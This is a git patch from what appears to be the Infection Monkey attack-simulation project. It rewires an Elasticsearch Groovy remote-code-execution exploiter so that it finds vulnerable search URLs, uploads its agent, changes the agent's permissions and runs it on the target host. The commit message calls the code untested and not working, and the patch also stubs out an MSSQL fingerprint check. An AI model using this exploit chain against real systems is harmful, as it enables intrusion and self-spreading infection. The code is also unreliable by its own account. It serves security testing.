From 8ddfb03f270884f6015ba1a2492065f625c20b73 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 20 Jul 2018 18:15:15 +0300 Subject: [PATCH] Uploaded and modified standard web_rce code usage.Not working, not tested --- infection_monkey/exploit/elasticgroovy.py | 72 +++++++++++-------- infection_monkey/network/mssql_fingerprint.py | 3 +- 2 files changed, 44 insertions(+), 31 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 989ae5cdf..d056afb05 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -9,17 +9,17 @@ import logging import requests -from exploit import HostExploiter from model import DROPPER_ARG from network.elasticfinger import ES_SERVICE, ES_PORT from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth +from exploit.web_rce import WebRCE __author__ = 'danielg' LOG = logging.getLogger(__name__) -class ElasticGroovyExploiter(HostExploiter): +class ElasticGroovyExploiter(WebRCE): # attack URLs BASE_URL = 'http://%s:%s/_search?pretty' MONKEY_RESULT_FIELD = "monkey_result" @@ -38,40 +38,52 @@ class ElasticGroovyExploiter(HostExploiter): def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) - self._config = __import__('config').WormConfiguration - self.skip_exist = self._config.skip_exploit_if_file_exist - - def is_os_supported(self): - """ - Checks if the host is vulnerable. - Either using version string or by trying to attack - :return: - """ - if not super(ElasticGroovyExploiter, self).is_os_supported(): - return False + def exploit_host(self): + # self.exploit_host_linux() if ES_SERVICE not in self.host.services: LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) return False - major, minor, build = self.host.services[ES_SERVICE]['version'].split('.') - major = int(major) - minor = int(minor) - build = int(build) - if major > 1: + # We need a reference to the exploiter for WebRCE framework to use + exploiter = self.exploit + # Build url from host and elastic port(not https) + urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) + vulnerable_urls = [] + for url in urls: + if WebRCE.check_if_exploitable(exploiter, url): + vulnerable_urls.append(url) + self._exploit_info['vulnerable_urls'] = vulnerable_urls + if not vulnerable_urls: return False - if major == 1 and minor > 4: - return False - if major == 1 and minor == 4 and build > 2: - return False - return self.is_vulnerable() - def exploit_host(self): - real_host_os = self.get_host_os() - self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters - if 'linux' in self.host.os['type']: - return self.exploit_host_linux() - else: - return self.exploit_host_windows() + if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): + LOG.info("Host %s was already infected under the current configuration, done" % self.host) + return True + + if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + return False + + data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) + + # We can't use 'if not' because response may be '' + if data is not False and data['response'] == False: + return False + + if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + return False + + if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: + return False + + return True + + def exploit(self, url, command): + payload = self.JAVA_CMD % command + response = requests.get(url, data=payload) + result = self.get_results(response) + if not result: # not vulnerable + return False + return result[0] def exploit_host_windows(self): """ diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index 9409c2255..ea4370d24 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - + # TODO remove auto-return + return False assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout